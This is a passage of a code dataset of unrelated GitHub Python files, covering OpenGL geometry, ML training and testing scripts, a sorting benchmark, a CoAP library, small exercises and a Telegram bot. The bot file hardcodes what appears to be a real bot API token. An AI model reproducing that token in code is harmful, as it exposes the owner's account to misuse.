T_PLANES\n V = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n for v in V:\n if unit == 1:\n v[0] -= W * 2 * self.rotation_times\n if unit == 2:\n v[0] -= W * 2 * (N - 1)\n v[2] += W * 2 * self.rotation_times\n if unit == 3:\n v[0] -= W * 2 * (N - 1) - W * 2 * self.rotation_times\n v[2] += W * 2 * (N - 1)\n\n T_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n ]\n self.is_rotated = False\n self.rotation_times += 1\n","repo_name":"veronikaKochugova/OpenGL","sub_path":"curs/NotConvex.py","file_name":"NotConvex.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22242061338","text":"\nimport cv2\nfrom visualize import visualize, show_image\nfrom load_dataset import load_image\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\n\n# Load autoencoder model\nautoencoder_faces = load_model('models/faces/faces.h5')\nautoencoder_cocoon = load_model('models/cocoon/cocoon.h5')\nprint(autoencoder_faces.summary())\nprint(autoencoder_cocoon.summary())\n\n# Testing\ntst_img = load_image(\"test_images/selfie.webp\")\ntst_img = tst_img.astype('float32')/255.0 - 0.5\ntst_img_32 = cv2.resize(tst_img, (32, 32))\ntst_img_32 = cv2.resize(tst_img, (32, 32))\nout1 = autoencoder_faces.predict(tst_img_32[None])[0]\nout2 = autoencoder_cocoon.predict(tst_img_32[None])[0]\n#visualize(tst_img,encoder,decoder)\n\nplt.subplot(2,2,1)\nplt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,2)\nplt.title(\"Reconstructed\")\nshow_image(out1)\n\nplt.subplot(2,2,3)\n#plt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,4)\n#plt.title(\"Reconstructed\")\nshow_image(out2)\nplt.show()","repo_name":"dvillacis/objeto_selfie","sub_path":"test_autoencoder.py","file_name":"test_autoencoder.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34205031945","text":"\"\"\"\nhttp://huge:file@www.pythonchallenge.com/pc/return/evil.html\n\"\"\"\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image\n\nDATA = \"http://huge:file@www.pythonchallenge.com/pc/return/evil2.gfx\"\n\n\ndef solve():\n data = requests.get(DATA).content\n\n for offset in range(5):\n img_data = bytes(b for b in data[offset::5])\n Image.open(BytesIO(img_data)).show()\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"arjandepooter/python-challenge","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3985111855","text":"import os\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport subprocess\nimport sys\n\ndata_sizes = [10000, 50000, 100000, 200000, 300000, 400000,\n 500000, 600000, 700000, 800000, 900000, 1000000]\nsort_times = {'heap_sort': [], 'merge_sort': [],\n 'quick_sort': [], 'shell_sort': []}\n\n\ndef compile_exe(sort_name: str) -> None:\n path = './src/{}.cpp'.format(sort_name)\n os.system('g++ -o ./exe/{} {}'.format(sort_name, path))\n\n\ndef call_exe(sort_name: str, random_data: list[int]) -> float:\n path = './exe/{}.exe'.format(sort_name)\n\n start_time = time.time()\n out = subprocess.Popen(path, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n out = out.communicate(input=' '.join(\n [str(i) for i in random_data]).encode('utf-8'))[0]\n end_time = time.time()\n\n out = out.decode('utf-8').split()\n out = [int(i) for i in out]\n if not check_sorted(out):\n print('Error: {} is not sorted!'.format(sort_name))\n sys.exit(1)\n\n return end_time - start_time\n\n\ndef check_sorted(data: list) -> bool:\n for i in range(len(data) - 1):\n if data[i] > data[i + 1]:\n return False\n return True\n\n\ndef generate_random_data(data_size: int) -> list[int]:\n data = [i for i in range(data_size)]\n random.shuffle(data)\n return data\n\n\ndef paint_data() -> None:\n for sort_name in sort_times.keys():\n plt.plot(data_sizes, sort_times[sort_name], label=sort_name)\n plt.xlabel('data size')\n plt.ylabel('running time')\n plt.title('running time of different sorting algorithms')\n plt.legend()\n plt.savefig('running_time.png')\n\ndef main() -> None:\n for sort_name in sort_times.keys():\n compile_exe(sort_name)\n\n for data_size in data_sizes:\n print('data size: {}'.format(data_size))\n random_data = generate_random_data(data_size)\n for sort_name in sort_times.keys():\n sort_times[sort_name].append(call_exe(sort_name, random_data))\n print('{} running time: {:.3f}'.format(sort_name, sort_times[sort_name][-1])) \n\n paint_data()\n\n\nif __name__ == '__main__': \n main()\n","repo_name":"fatbrother/Sorting-Graph","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71526725852","text":"from django.urls import path\n\nfrom .views import getLiked, insertLiked, deleteLiked, getLikedMoive\n\nurlpatterns = [\n path('getLiked/', getLiked, name='getLiked'),\n path('insertLiked/', insertLiked, name='insertLiked'),\n path('deleteLiked/', deleteLiked, name='deleteLiked'),\n path('getLikedMoive/', getLikedMoive, name='getLikedMoive')\n]\n","repo_name":"BaeJihyun97/Movie_Recommendation","sub_path":"backend/djangoreactapi/service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69894445851","text":"import torch\nimport os\n\nfrom abc import abstractmethod\nfrom numpy import inf\nfrom utils.io import prepare_device\nfrom logger import TensorboardWriter\n\nimport models.hppw as module_arch\nimport models.hppw as module_metric\nimport models.hppw as module_loss\nfrom models.projection.model import LinearProjection\nfrom utils.io import MetricTracker\n\nimport wandb\n\n\n\nclass BaseTrainer:\n \"\"\"\n Base class for all trainers\n \"\"\"\n def __init__(self, config):\n\n self.config = config\n self.logger = self.config.get_logger('trainer', config['trainer']['verbosity'])\n \n cfg_trainer = config['trainer']\n self.epochs = cfg_trainer['epochs']\n self.save_period = cfg_trainer['save_period']\n self.eval_period = cfg_trainer['eval_period']\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.checkpoint_dir = config.save_dir\n\n # setup visualization writer instance\n self.writer = None\n if config['tensorboard']:\n self.writer = TensorboardWriter(config.log_dir, self.logger)\n\n\n self.start_epoch = 1\n self.best_epoch = 1\n self.best_epoch = 1\n self.current_epoch = 1\n self.best_top1 = 0\n\n # prepare for (multi-device) GPU training\n # This part doesn't do anything if you don't have a GPU.\n self._device, self._device_ids = prepare_device(config['n_gpu'])\n self.wandb_enabled = config['wandb']\n if self.wandb_enabled:\n self.wandb = wandb\n\n self.wandb.login()\n self.wandb.init(project=\"human-pose-prediction-in-the-wild\")\n \n self.model = config.init_obj('arch', module_arch)\n self.model_proj = LinearProjection(**config[\"arch3d\"])\n self.model.to(self._device)\n if len(self._device_ids) > 1:\n self.model = torch.nn.DataParallel(self.model, device_ids=self._device_ids)\n\n # Simply Log the model (enable if you want to see the model architecture)\n # self.logger.info(self.model)\n # Prepare Losses\n # self.criterion = getattr(module_loss, config['loss'])\n self.criterion = getattr(module_loss, config['loss'][\"type\"])\n # Prepare Optimizer\n trainable_params = filter(lambda p: p.requires_grad, self.model.parameters())\n self.optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n self.lr_scheduler = config.init_obj('lr_scheduler', torch.optim.lr_scheduler, self.optimizer) \n \n self.metric_ftns = [getattr(module_metric, met['type'])(**met['args']) for met in config['metrics']]\n self.epoch_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n self.eval_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n \n @abstractmethod\n def _train_epoch(self):\n \"\"\"\n Training logic for an epoch. Only takes care of doing a single training loop.\n\n :return: A dict that contains average loss and metric(s) information in this epoch.\n \"\"\"\n raise NotImplementedError\n\n def train(self):\n \"\"\"\n Full training logic\n \"\"\"\n\n self.not_improved_count = 0\n prev_metric_value = 999999999999999 if self.monitor_mode == \"min\" else 0 \n if self.wandb_enabled: wandb.watch(self.model, self.criterion, log='all')\n states = {\"loss2d\": {\"train\": [], \"val\": []}, \"loss3d\": {\"train\": [], \"val\": []}}\n for epoch in range(self.start_epoch, self.epochs + 1):\n \n if epoch % self.curriculum[\"duration\"] == 0:\n \n self.future_window += self.curriculum[\"step\"]\n self.history_window += self.curriculum[\"step\"]\n \n if self.history_window > self.max_history_window:\n self.history_window = self.max_history_window\n \n if self.future_window > self.max_future_window:\n self.future_window = self.max_future_window\n \n self.logger.info(f\"Setting curriculum to history window: {self.history_window}, future window: {self.future_window}\") \n\n \n self.current_epoch = epoch\n train_result = self._train_epoch()\n states[\"loss2d\"][\"train\"].append(train_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"train\"].append(train_result[\"loss3d\"])\n # save logged informations into log dict\n log = {'epoch': self.current_epoch}\n log.update(train_result)\n\n if self._do_evaluate():\n eval_result = self.evaluate(history_window=self.history_window, future_window=self.future_window)\n states[\"loss2d\"][\"val\"].append(eval_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"val\"].append(eval_result[\"loss3d\"])\n # save eval information to the log dict as well\n log.update({f'eval_{key}': value for key, value in eval_result.items()})\n if self.wandb_enabled:\n self.wandb.log(log)\n\n\n\n if self.monitor_mode != 'off' : # Then there is a metric to monitor\n if self.monitor_metric in log: # Then we have measured it in this epoch\n\n \n metric_value = log[self.monitor_metric]\n if self.monitor_mode == \"min\" and metric_value < prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path)\n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n\n elif self.monitor_mode == \"max\" and metric_value > prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path) \n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n \n else:\n if self.early_stop:\n self.not_improved_count += 1\n if self.not_improved_count == self.early_stop:\n self.logger.info(f\"No improvement so far... breaking...goodby\")\n break\n self.logger.info(f\"Patience running out... {self.not_improved_count}\") \n\n\n else:\n ## The metric wasn't measured in this epoch. Don't change not_impoved_count or similar things here!!!\n self.logger.warning(f\"Warning: At epoch {self.current_epoch} Metric '{self.monitor_metric}' wasn't measured. Not monitoring it for this epoch.\")\n \n # print logged information to the screen\n for key, value in log.items():\n self.logger.info(' {:15s}: {}'.format(str(key), value))\n\n if self.wandb_enabled: wandb.log(log)\n\n if self.current_epoch % self.save_period == 0:\n # Just to regularly save the model every save_period epochs\n path = os.path.join(self.checkpoint_dir, f'per_epoch_model.pth')\n self.save_model(path=path)\n self.lr_scheduler.step(eval_result[\"loss2d\"])\n # Always save the last model\n path = os.path.join(self.checkpoint_dir, f'last_model.pth')\n self.save_model(path=path)\n return states\n\n def _do_evaluate(self):\n \"\"\"\n Based on the self.current_epoch and self.eval_interval, determine if we should evaluate.\n You can take hint from saving logic implemented in BaseTrainer.train() method\n\n returns a Boolean\n \"\"\"\n if self.current_epoch % self.eval_period == 0:\n return True\n else:\n return False\n \n @abstractmethod\n def evaluate(self, loader=None):\n \"\"\"\n Evaluate the model on the val_loader given at initialization\n\n :param loader: A Dataloader to be used for evaluation. If not given, it will use the \n self._eval_loader that's set during initialization..\n :return: A dict that contains metric(s) information for validation set\n \"\"\"\n raise NotImplementedError\n \n def save_model(self, path=None):\n \"\"\"\n Saves only the model parameters.\n : param path: path to save model (including filename.)\n \"\"\"\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n torch.save(self.model.state_dict(), path)\n self.logger.info(\"Checkpoint saved.\")\n \n def load_model(self, path=None):\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n torch.save(self.model.state_dict(), path)\n self.logger.info(\"Checkpoint saved.\")\n\n def load_model(self, path=None):\n \"\"\"\n Loads model params from the given path.\n : param path: path to save model (including filename.)\n \"\"\"\n self.logger.info(\"Loading checkpoint: {} ...\".format(path))\n self.model.load_state_dict(torch.load(path))\n self.logger.info(\"Checkpoint loaded.\")\n\n\n def save_checkpoint(self, path=None):\n \"\"\"\n Saving TRAINING checkpoint. Including the model params and other training stats\n (optimizer, current epoch, etc.)\n\n :param path: if True, rename the saved checkpoint to 'model_best.ckpt'\n :param path: if True, rename the saved checkpoint to 'model_best.ckpt'\n \"\"\"\n arch = type(self.model).__name__\n state = {\n 'arch': arch,\n 'epoch': self.current_epoch,\n 'model': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'lr_scheduler': self.lr_scheduler.state_dict(),\n 'monitor_best': self.monitor_best,\n 'config': self.config\n }\n torch.save(state, path)\n self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n\n\n def resume_checkpoint(self, resume_path=None):\n \"\"\"\n Loads TRAINING checkpoint. Including the model params and other training stats\n (optimizer, current epoch, etc.)\n\n :param path: Checkpoint path to be resumed\n \"\"\"\n resume_path = str(resume_path)\n self.logger.info(\"Loading checkpoint: {} ...\".format(resume_path))\n checkpoint = torch.load(resume_path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.monitor_best = checkpoint['monitor_best']\n\n # load architecture params from checkpoint.\n if checkpoint['config']['arch'] != self.config['arch']:\n self.logger.warning(\"Warning: Architecture configuration given in config file is different from that of \"\n \"checkpoint. This may yield an exception while state_dict is being loaded.\")\n missing_keys, unexpected_keys = self.model.load_state_dict(checkpoint['model'], strict=False)\n if len(missing_keys) > 0:\n self.logger.warning(f\"[WARNING] missing keys: {missing_keys}\")\n if len(unexpected_keys) > 0:\n self.logger.warning(f\"[WARNING] unexpected keys: {unexpected_keys}\")\n\n # load optimizer state from checkpoint only when optimizer type is not changed.\n if checkpoint['config']['optimizer']['type'] != self.config['optimizer']['type']:\n self.logger.warning(\"Warning: Optimizer type given in config file is different from that of checkpoint. \"\n \"Optimizer parameters not being resumed.\")\n else:\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n # load lr_scheduler state from checkpoint only when lr_scheduler type is not changed.\n if checkpoint['config']['lr_scheduler']['type'] != self.config['lr_scheduler']['type']:\n self.logger.warning(\"Warning: lr_scheduler type given in config file is different from that of checkpoint. \"\n \"lr_scheduler parameters not being resumed.\")\n else:\n self.lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n\n self.logger.info(\"Checkpoint loaded. Resume training from epoch {}\".format(self.start_epoch))\n","repo_name":"mohammadasim98/human-pose-prediction-in-the-wild","sub_path":"src/trainers/base3d.py","file_name":"base3d.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2602029529","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import poly\nfrom sympy.abc import B, a, b, c, d\nfrom scipy.optimize import minimize, basinhopping, brute, least_squares\n\nfrom sarima_plus_plus import sampleSeasonalARIMA, calculateSeasonalARIMA_error, \\\n calculateSeasonalARIMA_error_minimization_form_slow, \\\n SARIMA_error_squared, difference_series\n\nif __name__ == '__main__':\n p_poly = None\n q_poly = poly(1 - a * B, B) * poly(1 - b * B ** 4, B) * poly(1 - c * B ** 30, B)\n d_poly = poly(1 - B, B)\n\n q_symbols = [a, b, c]\n q_ARIMA_coeffs = [0.6, 0.2, 0.1]\n est_p_poly = None\n est_q_poly: poly = poly(q_poly.subs(dict(zip(q_symbols, q_ARIMA_coeffs))), B)\n\n y_t = sampleSeasonalARIMA(est_p_poly, d_poly, est_q_poly, 1, 1000)\n plt.plot(y_t, label=\"sampled ARIMA\", marker='x')\n\n a_t_error = calculateSeasonalARIMA_error(y_t, est_p_poly, d_poly, est_q_poly)\n plt.plot(a_t_error, label='sampled ARIMA error', marker='.', markevery=10)\n\n print(\"est_q_poly\", est_q_poly)\n print(\"Expected value of shock a_t\", np.mean(a_t_error))\n print(\"sd of shock a_t\", np.sqrt(np.var(a_t_error)))\n # remember: don't square error to determine the sd of a_t\n\n plt.legend()\n plt.show()\n ###################################################################\n\n myx0 = np.random.random(len(q_ARIMA_coeffs))\n myx0 /= np.sum(myx0)\n\n w_t = difference_series(y_t, d_poly)\n\n res = minimize(SARIMA_error_squared, x0=myx0,\n args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n method='Nelder-Mead', options={'maxiter': 5000, 'disp': True})\n print(\"estimated params (via minimize):\", res.df)\n print(\"true params:\", q_ARIMA_coeffs)\n print(\"initial guess:\", myx0)\n\n # warn: lm method does not allow bounds, therefore good initial guess is needed (?) (i.e. satisfying conditions like inveritibility)\n res = least_squares(calculateSeasonalARIMA_error_minimization_form_slow, bounds=(-2, 2), x0=myx0,\n args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n )\n print(\"estimated params (via least_squares):\", res.x)\n print(\"true params:\", q_ARIMA_coeffs)\n print(\"initial guess:\", myx0)\n","repo_name":"Irfan-Mu3/ai-ds-projects","sub_path":"time_series_analysis/time_series_funcs/spp_MA_test.py","file_name":"spp_MA_test.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39314756962","text":"# input\nname = str(input(\"Enter last name: \"))\ndependents = int(input(\"Enter the number of dependents: \"))\ngrossIncome = float(input(\"Enter gross income: $\"))\nagi = grossIncome-dependents*12000\n\n# process phase\nif agi > 50000:\n itr = 0.20\nelse:\n itr = 0.10\nincomeTax = agi*itr\nif incomeTax < 0:\n incomeTax = 100\n\n# output\nprint(name)\nprint(\"Gross income: $\", grossIncome)\nprint(\"Number of dependents: \", dependents)\nprint(\"Adjusted gross income: $\", agi)\nprint(\"Income tax: \", incomeTax)","repo_name":"katieserg/CIS106-Katie-Sergiyenko","sub_path":"PS3P5.py","file_name":"PS3P5.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12486999604","text":"import sys\nread = sys.stdin.readline\n\nn = int(read())\n\nif n <= 2 :\n print(n)\n exit()\n\ndp1 = [0, 1]\ndp2 = [1, 1]\n\nfor i in range(2, n) :\n c = []\n c.append(dp2[1]%15746)\n c.append((dp1[1]+dp2[1]%15746))\n #print(c)\n dp1 = dp2\n dp2 = c\n\nprint(sum(c)%15746)\n","repo_name":"HyunJungJo98/Algorithm-Study","sub_path":"DP/1904 - 01타일.py","file_name":"1904 - 01타일.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9655189","text":"from coapthon import defines\nfrom coapthon.utils import byte_len\n\n__author__ = 'Giacomo Tanganelli'\n\n\nclass Option(object):\n \"\"\"\n Class to handle the CoAP Options.\n \"\"\"\n def __init__(self):\n \"\"\"\n Data structure to store options.\n \"\"\"\n self._number = None\n self._value = None\n\n @property\n def number(self):\n \"\"\"\n Return the number of the option.\n\n :return: the option number\n \"\"\"\n return self._number\n\n @number.setter\n def number(self, value):\n \"\"\"\n Set the option number.\n\n :type value: int\n :param value: the option number\n \"\"\"\n self._number = value\n\n @property\n def value(self):\n \"\"\"\n Return the option value.\n\n :return: the option value in the correct format depending on the option\n \"\"\"\n if type(self._value) is None:\n self._value = bytearray()\n opt_type = defines.OptionRegistry.LIST[self._number].value_type\n if opt_type == defines.INTEGER:\n if byte_len(self._value) > 0:\n return int(self._value)\n else:\n return defines.OptionRegistry.LIST[self._number].default\n return self._value\n\n @value.setter\n def value(self, value):\n \"\"\"\n Set the value of the option.\n\n :param value: the option value\n \"\"\"\n if type(value) is str:\n value = bytearray(value, \"utf-8\")\n elif type(value) is int and byte_len(value) != 0:\n value = value\n elif type(value) is int and byte_len(value) == 0:\n value = 0\n self._value = value\n\n @property\n def length(self):\n \"\"\"\n Return the value length\n\n :rtype : int\n \"\"\"\n if isinstance(self._value, int):\n return byte_len(self._value)\n if self._value is None:\n return 0\n return len(self._value)\n\n def is_safe(self):\n \"\"\"\n Check if the option is safe.\n\n :rtype : bool\n :return: True, if option is safe\n \"\"\"\n if self._number == defines.OptionRegistry.URI_HOST.number \\\n or self._number == defines.OptionRegistry.URI_PORT.number \\\n or self._number == defines.OptionRegistry.URI_PATH.number \\\n or self._number == defines.OptionRegistry.MAX_AGE.number \\\n or self._number == defines.OptionRegistry.URI_QUERY.number \\\n or self._number == defines.OptionRegistry.PROXY_URI.number \\\n or self._number == defines.OptionRegistry.PROXY_SCHEME.number:\n return False\n return True\n\n @property\n def name(self):\n \"\"\"\n Return option name.\n\n :rtype : String\n :return: the option name\n \"\"\"\n return defines.OptionRegistry.LIST[self._number].name\n\n def __str__(self):\n \"\"\"\n Return a string representing the option\n\n :rtype : String\n :return: a message with the option name and the value\n \"\"\"\n return self.name + \": \" + str(self.value) + \"\\n\"\n\n def __eq__(self, other):\n \"\"\"\n Return True if two option are equal\n\n :type other: Option\n :param other: the option to be compared against\n :rtype : Boolean\n :return: True, if option are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n","repo_name":"Tanganelli/CoAPthon","sub_path":"coapthon/messages/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"32"}
+{"seq_id":"43360385154","text":"\n#This program calculate the numbers of students with while loop\n\n#the main function\ndef main():\n endProgram, totalScore, averageScores, score, number, counter = declareVariable()\n\n while endProgram == \"no\":\n declareVariable()\n number = getNumber()\n totalScore = getScores(number,totalScore)\n averageScores = getAverage(totalScore, number)\n printAverage(averageScores)\n endProgram = input(\"Do you want to end the program?(Enter no to process a new set of test score)\")\n\ndef declareVariable():\n endProgram = \"no\"\n totalScore = 0.0\n averageScores = 0.0\n score = 0\n number = 0\n counter = 1\n return endProgram, totalScore, averageScores, score, number, counter\n\ndef getNumber():\n number = int(input(\"How many students took the test\"))\n return number\n\ndef getScores(number,totalScore):\n counter = 1\n while counter <= number:\n score = int(input(\"Enter the score\"))\n totalScore += score\n counter += 1\n return totalScore\n\ndef getAverage(totalScore, number):\n averageScore = totalScore/number\n return averageScore\n\ndef printAverage(averageScores):\n print(\"The average Score is \", averageScores)\n#calls main\nmain()\n","repo_name":"ssd2192/Python","sub_path":"Total Students with While Loop.py","file_name":"Total Students with While Loop.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31744889754","text":"# Write a program that asks the user to enter an integer and prints two integers, root\n# and pwr, such that 0 < pwr < 6 and root**pwr is equal to the integer entered by the user. If no\n# such pair of integers exists, it should print a message to that effect.\n\n\nimport math\n\n\n\nnum = int(input(\"Enter an integer: \"))\nfound = False\n\n#set 0 < power < 6\nfor pwr in range(1,6):\n #found root with built func math.sqrt\n #root = round(num**(1/pwr))\n root = math.sqrt(num)\n #compare if root**power == num entered\n if root**pwr == num:\n found = True\n #if True print(root, power)\n print(f\"root = {root} and power = {pwr}\")\n print(f\"{root}^{pwr} = {num}\")\n\nif not found:\n print(\"No such pair of integers exists.\")\n\n###WHILE LOOP VERSION\n\n# num = int(input(\"Enter an integer: \"))\n# found = False\n# pwr = 2\n\n# while pwr < 6:\n# root = round(num**(1/pwr))\n# if root**pwr == num:\n# found = True\n# print(f\"{root}^{pwr} = {num}\")\n# pwr += 1\n\n# if not found:\n# print(\"No such pair of integers exists.\")\n\n\n","repo_name":"ShadrackAdom/Data-Science-SelfTaught-Learning-Path","sub_path":"OSSU/MIT-Intro-to-CS-Python/FingerExercise/rootpwr.py","file_name":"rootpwr.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21338834568","text":"from __future__ import unicode_literals\nimport youtube_dl\n\"\"\"\n# 仅下载视频\ntimes = int(input('输入要下载视频的数量:'))\nfor i in range(times):\n ydl_opts = {}\n ys_url = input(f'要下载{i+1}次的视频地址:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([ys_url])\n\"\"\"\n\n# 仅下载视频的音频\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\ntimes = int(input('输入要下载音频的数量:'))\nfor i in range(times):\n y_url = input(f'要下载{i+1}次音频的视频的地址:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([y_url])\n","repo_name":"getcoden/python-practise","sub_path":"10 有趣的脚本小程序/Download视频及youtube视频中仅下载音频.py","file_name":"Download视频及youtube视频中仅下载音频.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23427646474","text":"from telegram import Update, KeyboardButton, ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters, ConversationHandler\n\n\ndef start(updater: Update, context: CallbackContext): # Hardoyim bulish sharit\n updater.message.reply_text(\"Assalomu alakum \\n\\nIsmingizni kirting: ✍️\") # BU botga malumotni pirosta ekranga chiqarish\n # updater.message.text # Botga xabar junatsa qabul qiladi yani ushlob olish uchun\n return 2\n\n\ndef name(updater: Update, context: CallbackContext):\n name_my = updater.message.text\n updater.message.reply_text(\"Familiyangizni kiriting: ✍️\")\n\n return 3\n\n\ndef fname(updater: Update, context: CallbackContext):\n fname_my = updater.message.text\n updater.message.reply_text(\"Yoshingizni kiriting ✍️\")\n\n return 4\n\ndef danni(updater: Update, context: CallbackContext):\n danni_my = updater.message.text\n updater.message.reply_text(f\"Quyidagi ma'lumotlar tog'rimi?\\nISM:{start}\\nFAMILIYA:{name}\\nYOSH:{fname}\")\n return 5\n\ndef age(updater: Update, context: CallbackContext):\n go_to = [ # kinobka uchun uzgaruvchi\n [KeyboardButton(\"⬅️Oldinga\")]\n # KeyboardButton KInobka chiqarish () buni ichiga yozilgan malumot Knobkani ichiga yozlib qoladi\n ]\n # ReplyKeyboardMarkup -- BU kinobka uzgaruvchisini chaqirib beradi\n # resize_keyboard = True -- Kinobka razmer ni kechkena qilib beradi\n updater.message.reply_text(\"Keyingi bo'limga o'tilsinmi?\",\n reply_markup=ReplyKeyboardMarkup(go_to, resize_keyboard=True))\n age_my = updater.message.text\n\n return 6\n\n\ndef menu(updater: Update, context: CallbackContext):\n info_button = [\n [KeyboardButton(\"🍴 Menyu\")],\n [KeyboardButton(\"🛍 Mening buyurtmalarim\")],\n [KeyboardButton(\"✍️ Fikr bildirish\"), KeyboardButton(\"⚙️ Sozlamalar\")]\n ]\n updater.message.reply_text(\"Quydagilardan birini tanlang..\",\n reply_markup=ReplyKeyboardMarkup(info_button, resize_keyboard=True))\n\n return 1\n\n\ndef post_message(updater: Update, context: CallbackContext):\n button_end = [\n [KeyboardButton(\"⬅️ Ortga\")]\n ]\n msg = updater.message.text\n updater.message.reply_text(f\"{msg} buyrug'i bosildi\", reply_markup=ReplyKeyboardMarkup(button_end, resize_keyboard=True))\n\n return 7\n\n # return 2\n # updater.message.reply_text(f\"{msg} bo'limiga\")\n\n\ndef main():\n TOKENT = \"5132329633:AAGFHeFtlyJR4iHeWID7D7CloKzx4xO3AOQ\"\n\n updater = Updater(TOKENT)\n\n all_handler = ConversationHandler(\n entry_points=[CommandHandler(\"start\", start)],\n states={\n 1: [MessageHandler(Filters.text, post_message)],\n 2: [MessageHandler(Filters.text, name)],\n 3: [MessageHandler(Filters.text, fname)],\n 4: [MessageHandler(Filters.text, age)],\n 5: [MessageHandler(Filters.text, menu)], # bu def ni bajarish tartibi\n\n },\n fallbacks=[]\n )\n 